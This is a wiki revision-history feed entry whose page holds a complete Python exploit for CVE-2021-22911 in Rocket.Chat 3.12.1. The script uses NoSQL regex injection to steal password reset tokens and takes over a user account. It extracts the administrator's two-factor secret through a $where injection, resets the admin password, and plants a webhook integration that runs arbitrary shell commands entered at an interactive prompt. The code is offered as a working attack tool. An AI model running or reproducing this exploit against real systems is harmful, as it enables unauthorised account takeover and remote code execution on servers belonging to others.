https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-22911_Rocket.Chat_3.12.1_RCE%E6%BC%8F%E6%B4%9E
CVE-2021-22911 Rocket.Chat 3.12.1 RCE漏洞 - Revision history
2026-04-16T07:02:03Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-22911_Rocket.Chat_3.12.1_RCE%E6%BC%8F%E6%B4%9E&diff=4231&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) # Author: enox # Date: 06-06-2021 # Product: Rocket.Chat # Vendor: https://rocket.chat/ #..."
2021-06-07T12:11:55Z
<p>Created page with "==EXP== <pre> # Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) # Author: enox # Date: 06-06-2021 # Product: Rocket.Chat # Vendor: https://rocket.chat/ #..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated)<br />
# Author: enox<br />
# Date: 06-06-2021<br />
# Product: Rocket.Chat<br />
# Vendor: https://rocket.chat/<br />
# Vulnerable Version(s): Rocket.Chat 3.12.1<br />
# CVE: CVE-2021-22911<br />
# Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat<br />
<br />
#!/usr/bin/python<br />
<br />
import requests<br />
import string<br />
import time<br />
import hashlib<br />
import json<br />
import oathtool<br />
import argparse<br />
<br />
parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE')<br />
parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True)<br />
parser.add_argument('-a', help='Administrator email', required=True)<br />
parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True)<br />
args = parser.parse_args()<br />
<br />
<br />
adminmail = args.a<br />
lowprivmail = args.u<br />
target = args.t<br />
<br />
<br />
def forgotpassword(email,url):<br />
payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}'<br />
headers={'content-type': 'application/json'}<br />
r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False)<br />
print("[+] Password Reset Email Sent")<br />
<br />
<br />
def resettoken(url):<br />
u = url+"/api/v1/method.callAnon/getPasswordPolicy"<br />
headers={'content-type': 'application/json'}<br />
token = ""<br />
<br />
num = list(range(0,10))<br />
string_ints = [str(int) for int in num]<br />
characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints<br />
<br />
while len(token)!= 43:<br />
for c in characters:<br />
payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c)<br />
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)<br />
time.sleep(0.5)<br />
if 'Meteor.Error' not in r.text:<br />
token += c<br />
print(f"Got: {token}")<br />
<br />
print(f"[+] Got token : {token}")<br />
return token<br />
<br />
<br />
def changingpassword(url,token):<br />
payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}'<br />
headers={'content-type': 'application/json'}<br />
r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)<br />
if "error" in r.text:<br />
exit("[-] Wrong token")<br />
print("[+] Password was changed !")<br />
<br />
<br />
def twofactor(url,email):<br />
# Authenticating<br />
sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()<br />
payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}'<br />
headers={'content-type': 'application/json'}<br />
r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)<br />
if "error" in r.text:<br />
exit("[-] Couldn't authenticate")<br />
data = json.loads(r.text) <br />
data =(data['message'])<br />
userid = data[32:49]<br />
token = data[60:103]<br />
print(f"[+] Succesfully authenticated as {email}")<br />
<br />
# Getting 2fa code<br />
cookies = {'rc_uid': userid,'rc_token': token}<br />
headers={'X-User-Id': userid,'X-Auth-Token': token}<br />
payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}'<br />
r = requests.get(url+payload,cookies=cookies,headers=headers)<br />
code = r.text[46:98]<br />
print(f"Got the code for 2fa: {code}")<br />
return code<br />
<br />
<br />
def changingadminpassword(url,token,code):<br />
payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}'<br />
headers={'content-type': 'application/json'}<br />
r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)<br />
if "403" in r.text:<br />
exit("[-] Wrong token")<br />
<br />
print("[+] Admin password changed !")<br />
<br />
<br />
def rce(url,code,cmd):<br />
# Authenticating<br />
sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()<br />
headers={'content-type': 'application/json'}<br />
payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}'<br />
r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)<br />
if "error" in r.text:<br />
exit("[-] Couldn't authenticate")<br />
data = json.loads(r.text)<br />
data =(data['message'])<br />
userid = data[32:49]<br />
token = data[60:103]<br />
print("[+] Succesfully authenticated as administrator")<br />
<br />
# Creating Integration<br />
payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}'<br />
cookies = {'rc_uid': userid,'rc_token': token}<br />
headers = {'X-User-Id': userid,'X-Auth-Token': token}<br />
r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload)<br />
data = r.text<br />
data = data.split(',')<br />
token = data[12]<br />
token = token[9:57]<br />
_id = data[18]<br />
_id = _id[7:24]<br />
<br />
# Triggering RCE<br />
u = url + '/hooks/' + _id + '/' +token<br />
r = requests.get(u)<br />
print(r.text)<br />
<br />
############################################################<br />
<br />
<br />
# Getting Low Priv user<br />
print(f"[+] Resetting {lowprivmail} password")<br />
## Sending Reset Mail<br />
forgotpassword(lowprivmail,target)<br />
<br />
## Getting reset token<br />
token = resettoken(target)<br />
<br />
## Changing Password<br />
changingpassword(target,token)<br />
<br />
<br />
# Privilege Escalation to admin<br />
## Getting secret for 2fa<br />
secret = twofactor(target,lowprivmail)<br />
<br />
<br />
## Sending Reset mail<br />
print(f"[+] Resetting {adminmail} password")<br />
forgotpassword(adminmail,target)<br />
<br />
## Getting reset token<br />
token = resettoken(target)<br />
<br />
<br />
## Resetting Password<br />
code = oathtool.generate_otp(secret)<br />
changingadminpassword(target,token,code)<br />
<br />
## Authenticting and triggering rce<br />
<br />
while True:<br />
cmd = input("CMD:> ")<br />
code = oathtool.generate_otp(secret)<br />
rce(target,code,cmd)<br />
</pre></div>
Pwnwiki